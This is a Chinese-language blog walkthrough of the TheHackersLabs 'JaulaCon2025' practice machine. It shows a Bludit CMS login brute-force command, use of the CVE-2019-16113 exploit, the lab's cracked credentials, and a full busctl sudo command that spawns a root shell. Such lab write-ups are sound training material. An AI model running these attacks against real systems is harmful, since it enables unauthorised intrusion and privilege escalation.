TheHackersLabs-JaulaCon2025
JaulaCon2025
信息搜集
192.168.100.49
端口扫描
1 | ┌──(root㉿LAPTOP-O235O5EH)-[~] |
枚举 80
目录扫描
1 | ╭─root@LAPTOP-O235O5EH ~ |
需要写入hosts文件
1 | 192.168.100.49 jaulacon2025.thl |
/admin路由需要用户名和密码。这是一个bludit CMS同时查看源码可以知道具体的版本查看一下是否存在CVE
https://github.com/Kenun99/CVE-2019-16113-Dockerfile
但是需要用户名和密码。
又找了一下找到一个爆破用户密码的
https://github.com/CuriosidadesDeHackers/Bludit-3.9.2-Auth-Bypass/tree/main
user.txt是添加的Jaulacon2025
1 | python3 Bludit-Auth-Bypass.py -l http://192.168.100.49/admin/login.php -u user.txt -p /usr/share/wordlists/rockyou.txt |
登录凭证 Jaulacon2025:cassandra
获取shell
由于现在已经有用户名和密码了所以之前使用之前的脚本
https://github.com/Kenun99/CVE-2019-16113-Dockerfile
修改一下脚本
提权
www -> Jaulacon2025
在/var/www/html中含有数据库的配置里面存在用户凭证
var/www/html/bl-content/databases/users.php
解密hash
第三个可以解密
Jaulacon2025:Brutales
JaulaCon2025 -> root
busctl提权
Gtfobins有现成方案https://gtfobins.org/gtfobins/busctl/
1 | sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2' |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Eecho&小站!
相关推荐
2026-03-23
TheHackersLabs-Tortuga
Tortuga 信息搜集192.168.100.51 端口扫描1234567891011121314151617181920212223242526272829303132333435363738394041424344┌──(root㉿LAPTOP-O235O5EH)-[~]└─# rustscan -a 192.168.100.51.----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |`-' `-'`-----'`----' `-' `--...
2026-03-24
TheHackersLabs-Uploader
Uploader 信息搜集192.168.100.59 端口扫描123456789101112131415161718192021222324252627282930313233343536373839┌──(root㉿LAPTOP-O235O5EH)-[~]└─# rustscan -a 192.168.100.59.----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |`-' `-'`-----'`----' `-' `----' ...
2026-03-26
TheHackersLabs-NodeCeption
NodeCeption 信息搜集192.168.100.57 端口扫描123456789101112131415161718192021222324252627282930313233343536373839404142434445┌──(root㉿LAPTOP-O235O5EH)-[~]└─# rustscan -a 192.168.100.57.----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |`-' `-'`-----'`----' `-'...
2026-01-22
TheHackersLabs-ZAPP
ZAPP 信息搜集10.156.131.242 端口扫描1234567891011121314151617181920212223242526272829303132333435363738394041424344root@LAPTOP-O235O5EH [~/Desktop/test] ➜ rustscan -a 10.156.131.242 [20:33:24].----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }...
2026-01-21
TheHackersLabs-Mermelada
Mermelada 靶机地址:https://labs.thehackerslabs.com/machine/164 192.168.100.33 信息搜集端口扫描1234567891011121314151617181920212223242526root@LAPTOP-O235O5EH [~] ➜ rustscan -a 192.168.100.33 [13:46:36].----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ &...
2026-03-30
TheHackersLabs-WatchStore
WatchStore 信息搜集192.168.43.36 端口扫描123456789101112131415161718192021222324252627282930313233343536373839404142┌──(root㉿LAPTOP-O235O5EH)-[~]└─# rustscan -a 192.168.43.36.----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |`-' `-'`-----'`----' `-' `----&...
